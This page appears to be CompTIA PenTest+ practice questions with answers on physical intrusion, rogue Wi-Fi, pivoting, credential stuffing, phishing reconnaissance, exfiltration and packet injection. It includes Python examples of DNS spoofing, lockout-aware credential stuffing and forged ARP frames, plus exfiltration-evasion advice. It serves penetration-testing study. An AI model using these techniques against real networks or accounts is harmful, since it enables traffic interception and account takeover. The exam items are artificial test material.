[Attacks and Exploits]
A penetration tester is performing an authorized physical assessment. During the test, the tester observes an access control vestibule and on-site security guards near the entry door in the lobby. Which of the following is the best attack plan for the tester to use in order to gain access to the facility?
Answer : B
In an authorized physical assessment, the goal is to test physical security controls. Tailgating is a common and effective technique in such scenarios. Here's why option B is correct:
Tailgating: Following an authorized person through a controlled door without presenting credentials. During busy periods (shift changes, lunch, the morning rush) a steady stream of people moves through the vestibule, guards and employees are distracted, and one extra person attracts little attention. It directly tests the two controls the tester observed: the vestibule and the guards.
Cloning Badge Information: Can work, but it requires getting within read range of an employee's badge with a specialized reader, assumes the badge technology is cloneable, and takes more time and setup than simply walking in.
Picking Locks: More invasive, higher risk, and hard to do unnoticed with guards stationed at the door; it also only helps if the vestibule uses a mechanical lock at all.
Dropping USB Devices: Tests user awareness and endpoint controls, not physical access; a planted device does not get the tester through the door.
Reference: CompTIA PenTest+ PT0-003, physical attacks (tailgating, badge cloning, lock picking, USB drops).
Conclusion:
Option B, tailgating into the facility during a busy time, is the best attack plan to gain access to the facility in an authorized physical assessment.
[Tools and Code Analysis]
A company hires a penetration tester to test the security of its wireless networks. The main goal is to intercept and access sensitive data.
Which of the following tools should the security professional use to best accomplish this task?
Answer : B
WiFi-Pumpkin (wifipumpkin3 in current releases) is a rogue access point framework for man-in-the-middle (MitM) attacks on Wi-Fi networks, which is exactly what is needed to intercept and access client traffic.
Option A (Metasploit): Good for exploitation, but not specialized for Wi-Fi attacks.
Option B (WiFi-Pumpkin): Correct.
Creates a fake (evil twin or open) Wi-Fi access point that clients associate with, and hands them DHCP and DNS settings the attacker controls.
Intercepts the traffic that then flows through it (transparent proxying, SSL stripping, DNS spoofing, captive portals).
Option C (SET - Social Engineering Toolkit): Focuses on phishing and credential harvesting pages, not Wi-Fi attacks.
Option D (theHarvester): Used for OSINT, not Wi-Fi exploitation.
Option E (WiGLE.net): Maps Wi-Fi networks from war-driving data, but does not capture sensitive data.
Reference: CompTIA PenTest+ PT0-003 Official Guide -- Wireless Attacks & Fake APs
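To make the DNS-spoofing step concrete, here is an added example (not code from WiFi-Pumpkin or from the original page) of the work a rogue-AP toolkit does once it is the victim's DNS server: parse the client's query and, when the name matches a target domain, answer with an attacker-chosen address while leaving every other name untouched. The query bytes, the attacker IP 10.0.0.1 and the target domain example.com are constructed for the example.

```python
"""Minimal DNS-spoofing responder, the kind a rogue-AP toolkit runs once it
has become the victim's DNS server. Added example for this page; it is not
code from WiFi-Pumpkin or any other tool. The query below, the attacker IP
10.0.0.1 and the target domain example.com are all constructed here.

Only the DNS payload is handled (RFC 1035 wire format). A real responder
also sends the reply back to the querying UDP source port and must either
beat the legitimate resolver to the answer or, as a rogue AP does, be the
resolver that DHCP handed the client.
"""
import struct

A_RECORD, CLASS_IN = 1, 1


def parse_dns_query(packet: bytes):
    """Parse a single-question DNS query.

    Returns (transaction_id, qname, qtype, qclass, question_end_offset).
    """
    if len(packet) < 12:
        raise ValueError("truncated DNS header")
    tid, flags, qdcount, _, _, _ = struct.unpack("!HHHHHH", packet[:12])
    if flags & 0x8000:
        raise ValueError("QR bit set: this is a response, not a query")
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    labels, pos = [], 12
    while True:
        if pos >= len(packet):
            raise ValueError("truncated QNAME")
        length = packet[pos]
        pos += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointers are not valid in a query name")
        labels.append(packet[pos:pos + length].decode("ascii"))
        pos += length
    if pos + 4 > len(packet):
        raise ValueError("truncated question section")
    qtype, qclass = struct.unpack("!HH", packet[pos:pos + 4])
    return tid, ".".join(labels).lower(), qtype, qclass, pos + 4


def build_query(tid: int, name: str, qtype: int = A_RECORD) -> bytes:
    """Build the query a client would send (used here to construct test input)."""
    packet = struct.pack("!HHHHHH", tid, 0x0100, 1, 0, 0, 0)  # RD=1, one question
    for label in name.strip(".").split("."):
        packet += bytes([len(label)]) + label.encode("ascii")
    return packet + b"\x00" + struct.pack("!HH", qtype, CLASS_IN)


def spoof_response(query: bytes, spoof_ip: str, targets, ttl: int = 60):
    """Return a forged A answer if the name matches a target, else None.

    Non-matching names return None so the caller can forward them to a real
    resolver; spoofing everything would break the victim's session and stand
    out immediately. A short TTL keeps the poisoned entry from outliving the
    engagement in the client's cache.
    """
    tid, qname, qtype, qclass, qend = parse_dns_query(query)
    if qtype != A_RECORD or qclass != CLASS_IN:
        return None
    if not any(qname == t or qname.endswith("." + t) for t in targets):
        return None
    # Flags 0x8180: QR=1 (response), RD=1, RA=1, RCODE=0 (no error).
    header = struct.pack("!HHHHHH", tid, 0x8180, 1, 1, 0, 0)
    question = query[12:qend]  # echoed back unchanged
    # Answer RR: name = pointer to offset 12 (0xC00C), type A, class IN,
    # TTL, RDLENGTH 4, then the spoofed IPv4 address.
    rdata = bytes(int(octet) for octet in spoof_ip.split("."))
    answer = b"\xc0\x0c" + struct.pack("!HHIH", A_RECORD, CLASS_IN, ttl, 4) + rdata
    return header + question + answer


def answer_ip(response: bytes) -> str:
    """Read the spoofed address back out of a response built above."""
    return ".".join(str(b) for b in response[-4:])


if __name__ == "__main__":
    # Constructed query: the victim resolves login.example.com.
    query = build_query(0x1234, "login.example.com")
    forged = spoof_response(query, "10.0.0.1", ["example.com"])
    print("forged answer:", answer_ip(forged))
    unrelated = spoof_response(build_query(1, "other.org"), "10.0.0.1", ["example.com"])
    print("unrelated name spoofed?", unrelated is not None)
```

The transaction ID is copied from the query because a resolver drops any answer whose ID does not match; on the rogue AP this is trivial since the attacker sees the query, which is what makes the rogue-AP position so much stronger than blind cache poisoning.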
[Attacks and Exploits]
A tester wants to pivot from a compromised host to another network with encryption and the least amount of interaction with the compromised host. Which of the following is the best way to accomplish this objective?
Answer : A
Pivoting allows attackers to use a compromised host as a gateway to access internal resources.
Create an SSH tunnel using sshuttle (Option A):
sshuttle creates a transparent, VPN-like tunnel over an SSH session: the tester points it at the target subnets and local traffic for those ranges is routed through the compromised host without per-application proxy configuration.
Advantages:
Provides end-to-end encryption over SSH, so an IDS/IPS on the path cannot inspect the pivoted traffic (the SSH session itself is still visible as a single connection).
Requires minimal interaction with the compromised host: sshuttle needs only SSH access and a Python interpreter there, uploads a small helper at run time, and installs nothing persistent.
Incorrect options:
Option B (VNC server): VNC is a remote-desktop protocol, not a routing tool; its RFB traffic is unencrypted unless separately tunneled, and it requires installing and driving a server on the host.
Option C (Metasploit listener): Routing through a Meterpreter session means running a payload on the host, which is heavy interaction and a common EDR detection.
Option D (Netcat connection): Netcat relays traffic in plaintext with no encryption, so the pivoted data is fully visible on the wire.
[Attacks and Exploits]
A penetration tester obtains password dumps associated with the target and identifies strict lockout policies. The tester does not want to lock out accounts when attempting access. Which of the following techniques should the tester use?
Answer : A
To avoid locking out accounts while attempting access, the penetration tester should use credential stuffing.
Credential Stuffing:
Definition: An attack method where attackers use a list of known username and password pairs, typically obtained from previous data breaches, to gain unauthorized access to accounts.
Advantages: Unlike a brute-force or dictionary attack, credential stuffing tries the one known username/password pair per account that the dump supplies, so each account sees a single attempt, well below any lockout threshold. The tester should still count attempts per account and pace them, since several dumps may hold different passwords for the same user.
Tools: Sentry MBA, Snipr, and similar tools are commonly used for credential stuffing attacks.
Other Techniques:
MFA Fatigue: A social engineering tactic that floods a user with push notifications until they approve one; it presumes a valid password is already known and has nothing to do with avoiding lockouts.
Dictionary Attack: Like brute force but driven by a list of likely passwords; it still makes many attempts per account and so risks lockout.
Brute-force Attack: Systematically attempts every possible password; the high number of failed attempts per account is almost certain to trigger lockouts.
Pentest Reference:
Password Attacks: Understanding different types of password attacks and their implications on account security.
Account Lockout Policies: Awareness of how lockout mechanisms work and strategies to avoid triggering them during penetration tests.
By using credential stuffing, the penetration tester can attempt to gain access using known credentials without triggering account lockout policies, ensuring a stealthier approach to password attacks.
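The difference in attempt counts per account is easy to see in code. The following is an added example for this page (not from any real tool such as Sentry MBA or Snipr): a mock login endpoint with a constructed lockout policy, a client-side attempt budget the tester keeps below the observed threshold, and the two attack styles run against it. The account names, passwords and dump contents are constructed.

```python
"""Why credential stuffing stays under a lockout threshold while a dictionary
attack trips it. Added example for this page; MockAuth stands in for the
target's login endpoint and the accounts, passwords, dump contents and
lockout policy are all constructed. No real tool is modelled.
"""
from collections import defaultdict


class MockAuth:
    """Login endpoint with a strict lockout policy: `threshold` failed
    attempts within `window` seconds lock the account for `lock_seconds`."""

    def __init__(self, creds, threshold=3, window=600.0, lock_seconds=900.0):
        self.creds = creds
        self.threshold, self.window, self.lock_seconds = threshold, window, lock_seconds
        self.failures = defaultdict(list)  # user -> timestamps of recent failures
        self.locked_until = {}

    def login(self, user, password, now):
        if self.locked_until.get(user, 0.0) > now:
            return "locked"
        if self.creds.get(user) == password:
            self.failures[user].clear()
            return "success"
        recent = [t for t in self.failures[user] if now - t < self.window] + [now]
        self.failures[user] = recent
        if len(recent) >= self.threshold:
            self.locked_until[user] = now + self.lock_seconds
            return "locked"
        return "failure"


class AttemptBudget:
    """Client-side guard the tester keeps regardless of attack style: never
    send more than `max_attempts` tries per account inside `window` seconds.
    Set max_attempts below the lockout threshold learned during recon."""

    def __init__(self, max_attempts, window):
        self.max_attempts, self.window = max_attempts, window
        self.sent = defaultdict(list)

    def allowed(self, user, now):
        self.sent[user] = [t for t in self.sent[user] if now - t < self.window]
        return len(self.sent[user]) < self.max_attempts

    def record(self, user, now):
        self.sent[user].append(now)


def credential_stuffing(auth, dump_pairs, budget, now=0.0):
    """One attempt per account, using the exact pair found in the dump."""
    results = {}
    for user, password in dump_pairs:
        if not budget.allowed(user, now):
            results[user] = "skipped"  # budget exhausted; retry after the window
            continue
        budget.record(user, now)
        results[user] = auth.login(user, password, now)
    return results


def dictionary_attack(auth, user, wordlist, now=0.0):
    """Naive wordlist walk against one account: stops on success or lockout."""
    outcomes = []
    for password in wordlist:
        outcome = auth.login(user, password, now)
        outcomes.append(outcome)
        if outcome in ("success", "locked"):
            break
    return outcomes


# Constructed data: the target's current credentials and a leaked dump in
# which one user (bob) has since changed their password.
TARGET_CREDS = {"alice": "Winter2024!", "bob": "hunter2", "carol": "letmein"}
DUMP_PAIRS = [("alice", "Winter2024!"), ("bob", "oldpassword1"), ("carol", "letmein")]
WORDLIST = ["123456", "password", "qwerty", "hunter2"]


def demo():
    budget = AttemptBudget(max_attempts=2, window=600.0)  # threshold observed as 3
    stuffing = credential_stuffing(MockAuth(TARGET_CREDS), DUMP_PAIRS, budget)
    dictionary = dictionary_attack(MockAuth(TARGET_CREDS), "bob", WORDLIST)
    return stuffing, dictionary


if __name__ == "__main__":
    stuffing, dictionary = demo()
    print("credential stuffing:", stuffing)        # no account locked
    print("dictionary attack on bob:", dictionary)  # locked before reaching hunter2
```

The dictionary run locks bob's account on the third failure and never reaches the correct password, while the stuffing run touches each account once and leaves every account usable, including the one whose leaked password was stale.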
A penetration tester wants to gather the names of potential phishing targets who have access to sensitive data. Which of the following would best meet this goal?
Answer : D
theHarvester is purpose-built for the reconnaissance that feeds social engineering and phishing assessments: it collects email addresses, employee names, subdomains and hosts from public sources (search engines, PGP key servers and other OSINT repositories). In a PenTest+ workflow this maps directly onto the objective of identifying the specific people who could be targeted in a phishing simulation, especially when the tester needs a list of likely corporate users in order to validate awareness controls and email security. Which of those names belong to people with access to sensitive data still has to be inferred from other sources such as job titles and org charts, since theHarvester returns names and addresses rather than roles.
[Attacks and Exploits]
Which of the following is the most efficient way to exfiltrate a file containing data that could be sensitive?
Answer : D
Sending an encrypted file over HTTPS is the most efficient, secure, and least suspicious way to exfiltrate data. HTTPS encrypts the transport and is ubiquitous outbound traffic, so it generates far fewer alerts in monitoring systems; encrypting the file itself beforehand also keeps the contents hidden from a TLS-inspecting proxy.
Other options such as dnscat are stealthier but much slower (data has to be packed into DNS queries) and require the tester to control DNS infrastructure for a domain. Steganography or TFTP can be useful in specific situations, but FTP/TFTP are unencrypted and rarely used today, which makes that traffic stand out.
Referencia: PT0-003 Objective 4.3 -- Explain post-exploitation techniques, including data exfiltration methods.
[Attacks and Exploits]
A penetration tester aims to exploit a vulnerability in a wireless network that lacks proper encryption. The lack of proper encryption allows malicious content to infiltrate the network. Which of the following techniques would most likely achieve the goal?
Answer : A
If a wireless network lacks proper encryption (open, or WEP), frames on it are neither confidential nor authenticated, so an attacker can inject forged packets into the traffic stream and stations will process them.
Packet injection (Option A):
The attacker forges frames and transmits them from a monitor-mode interface to manipulate network behavior.
Classic uses: replaying captured ARP requests to force a WEP access point to generate traffic with fresh IVs, and injecting spoofed ARP or DHCP responses on an open network to redirect clients through the attacker.
Incorrect options:
Option B (Bluejacking): Sends unsolicited messages to nearby devices over Bluetooth; it has nothing to do with the Wi-Fi network.
Option C (Beacon flooding): Broadcasts large numbers of fake beacon frames advertising bogus SSIDs, which confuses clients and scanners; it does not get content into an existing network's traffic.
Option D (Signal jamming): Disrupts connectivity but does not inject packets.
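What "frames are accepted as-is" means on the wire is easiest to show by building one. The following is an added example for this page, not code from aireplay-ng, scapy or any other tool: it constructs an 802.11 data frame, marked as if relayed by the access point, that carries a spoofed ARP reply pointing the gateway's IP at the attacker's MAC, then parses it back the way a receiving station would. The BSSID, MAC and IP addresses are constructed; nothing is transmitted (that would need a monitor-mode interface and a raw socket).

```python
"""Forge an 802.11 data frame carrying a spoofed ARP reply, the way packet
injection works against an open (unencrypted) network. Added example for this
page, not code from aireplay-ng, scapy or any other tool; the BSSID, MAC and
IP addresses are constructed. The frame is only built and parsed here.
"""
import struct
import zlib

# LLC/SNAP header that precedes an Ethernet-style payload in 802.11 data
# frames: DSAP/SSAP 0xAA, control 0x03, OUI 00:00:00, EtherType 0x0806 (ARP).
LLC_SNAP_ARP = b"\xaa\xaa\x03\x00\x00\x00\x08\x06"


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip_bytes(ip):
    return bytes(int(o) for o in ip.split("."))


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """ARP reply (opcode 2) claiming sender_ip is at sender_mac."""
    return (struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)
            + mac_bytes(sender_mac) + ip_bytes(sender_ip)
            + mac_bytes(target_mac) + ip_bytes(target_ip))


def build_data_frame(bssid, src_mac, dst_mac, payload, seq=0):
    """802.11 data frame with FromDS=1, i.e. it looks like the AP relayed it.

    With no encryption the Protected Frame bit is clear and there is no MIC,
    so nothing ties the frame to the real AP: any radio can transmit it and
    the destination station accepts it.
    """
    frame_control = bytes([0x08, 0x02])  # type 2 (data), subtype 0; flag FromDS
    duration = b"\x00\x00"
    # FromDS=1: Addr1 = destination, Addr2 = BSSID, Addr3 = source.
    header = (frame_control + duration + mac_bytes(dst_mac) + mac_bytes(bssid)
              + mac_bytes(src_mac) + struct.pack("<H", (seq & 0xFFF) << 4))
    body = header + LLC_SNAP_ARP + payload
    fcs = struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF)  # CRC-32 trailer
    return body + fcs


def parse_data_frame(frame):
    """Verify the FCS and unpack the header, LLC/SNAP and payload."""
    body, fcs = frame[:-4], frame[-4:]
    if struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF) != fcs:
        raise ValueError("bad FCS")
    fc0, fc1 = body[0], body[1]
    if (fc0 >> 2) & 0x3 != 2:
        raise ValueError("not a data frame")
    if len(body) < 32 or body[24:30] != LLC_SNAP_ARP[:6]:
        raise ValueError("no LLC/SNAP header")
    return {
        "protected": bool(fc1 & 0x40),  # set only on encrypted networks
        "from_ds": bool(fc1 & 0x02),
        "dst": mac_str(body[4:10]),
        "bssid": mac_str(body[10:16]),
        "src": mac_str(body[16:22]),
        "ethertype": struct.unpack("!H", body[30:32])[0],
        "payload": body[32:],
    }


def parse_arp(payload):
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", payload[:8])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("not an IPv4-over-Ethernet ARP packet")
    return {
        "op": op,
        "sender_mac": mac_str(payload[8:14]),
        "sender_ip": ".".join(map(str, payload[14:18])),
        "target_mac": mac_str(payload[18:24]),
        "target_ip": ".".join(map(str, payload[24:28])),
    }


# Constructed addresses for the demo.
BSSID = "00:11:22:33:44:55"
GATEWAY_IP, ATTACKER_MAC = "192.168.1.1", "de:ad:be:ef:00:01"
VICTIM_MAC, VICTIM_IP = "aa:bb:cc:dd:ee:ff", "192.168.1.50"


def forged_gateway_arp():
    """Frame telling the victim that the gateway's IP lives at the attacker's MAC."""
    arp = build_arp_reply(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    return build_data_frame(BSSID, ATTACKER_MAC, VICTIM_MAC, arp, seq=42)


if __name__ == "__main__":
    parsed = parse_data_frame(forged_gateway_arp())
    print(parsed["protected"], parsed["from_ds"], hex(parsed["ethertype"]))
    print(parse_arp(parsed["payload"]))
```

The only integrity check a receiver performs on this frame is the CRC-32 FCS, which anyone can compute. On a WPA2/WPA3 network the Protected Frame bit must be set and the frame must carry a valid CCMP/GCMP MIC under the pairwise key, so the same forged frame is silently dropped; that is the "proper encryption" the question refers to.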